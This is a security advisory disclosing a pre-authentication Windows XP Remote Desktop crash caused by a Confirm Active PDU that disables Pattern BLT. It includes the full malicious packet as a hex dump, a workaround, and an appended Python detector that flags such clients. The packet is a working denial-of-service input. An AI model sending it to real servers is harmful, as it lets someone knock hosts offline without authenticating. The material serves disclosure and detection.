Vulnerable
  Microsoft Windows XP Professional
  Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable
  Microsoft Windows 2000 Server

Background
Windows XP Professional is vulnerable to a remote denial of service when Remote Desktop is enabled. Remote Desktop is XP Professional's single-user RDP server (Terminal Services).

Discussion
At the start of the protocol, client and server negotiate their graphics capabilities in a packet called PDU Confirm Active. A block of 32 bytes in this packet allows the client to disable the drawing commands that it does not support. One of these apparently controls whether the Pattern BLT command is sent. On Windows 2000 Server, disabling this command makes the server send bitmaps instead of Pattern BLT commands. Windows XP Professional, however, apparently reboots when it tries to render patterns; since this happens while the login screen is being drawn, the client does not need to have logged on or authenticated to the server. This applies to all versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also reproducible with Windows .NET Standard Server Beta 3.

Workaround
Disable Remote Desktop (Control Panel, System, Remote tab, Remote Desktop: deselect the option "Allow users to connect remotely to this computer").

Exploit
Shown below are the unencrypted packet contents of the problematic PDU Confirm Active packet. The only change from the packet the client normally sends is from 01 to 00 on the line indicated.
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01

References
Section 8.2.5 of T.128, Multipoint application sharing, Series T: Terminals for telematic services, ITU-T.

Microsoft was notified on 16 April 2002.

Credits
Ben Cohen
ben.cohen@skygate.co.uk
Skygate Technology Ltd.
http://www.skygate.co.uk/
+44 (0)20 8542 7856
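As an added example (not part of the advisory), the following Python parser walks the capability-set list of a Confirm Active PDU and reports which primary drawing orders the client has declared unsupported, so a server-side monitor or IDS can flag a client that clears the Pattern BLT entry before the login screen is drawn. It assumes the Order Capability Set layout from MS-RDPBCGR 2.2.7.1.3, where the byte the advisory changes is index 1 of the 32-byte orderSupport array (TS_NEG_PATBLT_INDEX); the fixture is the General and Order sets copied from the dump above, and the "original" fixture restores that byte to 01.

```python
import struct

CAPSTYPE_ORDER = 0x0003
PATBLT_INDEX = 1  # TS_NEG_PATBLT_INDEX within the 32-byte orderSupport array
# Names for the orderSupport indices used here (MS-RDPBCGR 2.2.7.1.3).
ORDER_NAMES = {0: "DstBlt", 1: "PatBlt", 2: "ScrBlt", 3: "MemBlt",
               4: "Mem3Blt", 8: "LineTo", 22: "FastGlyph", 25: "GlyphIndex"}

# Fixture: the General (24 bytes) and Order (88 bytes) capability sets copied
# from the advisory's dump, with orderSupport[1] cleared as in the crashing packet.
EXPLOIT_CAPS = bytes.fromhex("".join([
    "01 00 18 00 01 00 03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00",
    "03 00 58 00", "00" * 20, "01 00 14 00 00 00 01 00 00 00 2a 00",  # hdr..orderFlags
    "01 00 01 01 01 00 00 01 01 01 00 01 00 00 00 01",  # orderSupport[0:16]
    "01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00",  # orderSupport[16:32]
    "a1 06 00 00 00 00 00 00 00 84 03 00 00 00 00 00 e4 04 00 00",  # textFlags..pad
]))
# The unmodified client packet ("was 2a 00 01 01"): byte 61 is orderSupport[1].
ORIGINAL_CAPS = EXPLOIT_CAPS[:61] + b"\x01" + EXPLOIT_CAPS[62:]

def walk_capability_sets(caps):
    """Yield (capabilitySetType, body) for each TLV in a combined capability list."""
    off = 0
    while off + 4 <= len(caps):
        cap_type, length = struct.unpack_from("<HH", caps, off)
        if length < 4 or off + length > len(caps):
            raise ValueError(f"bad capability set length {length} at offset {off}")
        yield cap_type, caps[off + 4:off + length]
        off += length

def order_support(caps):
    """Return the 32-byte orderSupport array from the Order Capability Set."""
    for cap_type, body in walk_capability_sets(caps):
        if cap_type == CAPSTYPE_ORDER and len(body) >= 64:
            # terminalDescriptor(16) pad(4) xGran(2) yGran(2) pad(2)
            # maxOrderLevel(2) numberFonts(2) orderFlags(2) orderSupport(32)
            return body[32:64]
    raise ValueError("no usable Order Capability Set")

def disabled_orders(caps):
    """Names (or indices) of the orders the client has declared unsupported."""
    return [ORDER_NAMES.get(i, f"order#{i}") for i, b in enumerate(order_support(caps)) if b == 0]

def disables_patblt(caps):
    """True if the client asks the server not to send Pattern BLT orders."""
    return order_support(caps)[PATBLT_INDEX] == 0

if __name__ == "__main__":
    print("exploit packet disables:", disabled_orders(EXPLOIT_CAPS))
    print("flag PatBlt-disabled client:", disables_patblt(EXPLOIT_CAPS))
```

A server-side check like `disables_patblt` can raise an alert before any authentication, since the Confirm Active exchange precedes logon.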